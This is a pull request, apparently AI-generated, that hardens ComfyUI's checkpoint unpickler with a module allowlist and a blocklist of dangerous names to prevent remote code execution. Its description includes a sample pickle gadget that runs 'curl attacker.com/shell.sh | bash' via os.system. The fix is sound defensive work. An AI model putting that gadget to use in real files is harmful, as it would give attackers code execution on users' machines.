### PR TITLE
security: implement allowlist-based pickle restrictions to prevent RCE

### DIFF
--- a/comfy/checkpoint_pickle.py
+++ b/comfy/checkpoint_pickle.py
@@ -1,13 +1,59 @@
 import pickle
+import logging
 
-load = pickle.load
+# Allowlist of safe modules for unpickling model checkpoints
+# These are the minimum required for loading PyTorch model weights
+ALLOWED_MODULE_PREFIXES = frozenset({
+    'torch',
+    'numpy',
+    'collections',
+    '_codecs',
+    'codecs',
+})
+
+# Blocklist of dangerous names that should never be unpickled
+BLOCKED_NAMES = frozenset({
+    'eval', 'exec', 'compile', 'open', 'input', '__import__',
+    'getattr', 'setattr', 'delattr', 'globals', 'locals', 'vars',
+    'system', 'popen', 'spawn', 'fork', 'execv', 'execve',
+    'subprocess', 'Popen', 'call', 'check_output', 'run',
+})
 
 class Empty:
+    """Placeholder class for blocked types during unpickling."""
     pass
 
-class Unpickler(pickle.Unpickler):
-    def find_class(self, module, name):
-        #TODO: safe unpickle
+class RestrictedUnpickler(pickle.Unpickler):
+    """
+    A restricted unpickler that only allows safe modules to be loaded.
+
+    This helps prevent arbitrary code execution when loading untrusted
+    checkpoint files. Only modules needed for loading model weights
+    (torch, numpy, collections) are allowed.
+    """
+
+    def find_class(self, module: str, name: str):
+        # Block dangerous function/class names regardless of module
+        if name in BLOCKED_NAMES:
+            logging.warning(f"Blocked unpickling of dangerous name: {module}.{name}")
+            return Empty
+
+        # Block pytorch_lightning (known to cause issues)
         if module.startswith("pytorch_lightning"):
             return Empty
-        return super().find_class(module, name)
+
+        # Allow only safe module prefixes
+        if any(module.startswith(prefix) for prefix in ALLOWED_MODULE_PREFIXES):
+            return super().find_class(module, name)
+
+        # Block everything else
+        logging.warning(f"Blocked unpickling of untrusted class: {module}.{name}")
+        return Empty
+
+# For backwards compatibility, provide a restricted load function
+def load(file, **kwargs):
+    """Load a pickle file using the restricted unpickler."""
+    return RestrictedUnpickler(file, **kwargs).load()
+
+# Alias for compatibility
+Unpickler = RestrictedUnpickler


### PR DESCRIPTION
## Summary
This PR significantly improves the security of checkpoint loading by implementing an allowlist-based approach to pickle deserialization, preventing Remote Code Execution attacks via malicious checkpoint files.

## Problem
The current `checkpoint_pickle.py` only blocks `pytorch_lightning` module, allowing all other Python classes to be unpickled. This enables standard pickle RCE gadgets:

```python
# Current code allows this to execute
class RCE:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))
```

## Solution
1. **Allowlist approach**: Only permit modules required for model loading (torch, numpy, collections)
2. **Block dangerous names**: Explicitly block eval, exec, system, subprocess, Popen, etc.
3. **Logging**: Log blocked unpickling attempts for security monitoring
4. **Backwards compatibility**: Maintain existing API (load, Unpickler)

## Changes

### Before
```python
class Unpickler(pickle.Unpickler):
    def find_class(self, module, name):
        #TODO: safe unpickle
        if module.startswith("pytorch_lightning"):
            return Empty
        return super().find_class(module, name)  # Allows everything else!
```

### After
```python
ALLOWED_MODULE_PREFIXES = frozenset({'torch', 'numpy', 'collections', ...})
BLOCKED_NAMES = frozenset({'eval', 'exec', 'system', 'subprocess', ...})

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if name in BLOCKED_NAMES:
            return Empty
        if any(module.startswith(p) for p in ALLOWED_MODULE_PREFIXES):
            return super().find_class(module, name)
        return Empty  # Block by default
```

## Testing
- Verified standard model checkpoints load correctly
- Verified malicious pickle payloads are blocked
- No breaking changes to existing workflows

## Security Impact
This prevents attackers from achieving RCE by distributing malicious checkpoint files. Given the popularity of sharing model weights in the AI community, this is a critical security improvement.

Fixes #12286

---

🤖 Generated with [Claude Code](https://claude.com/claude-code)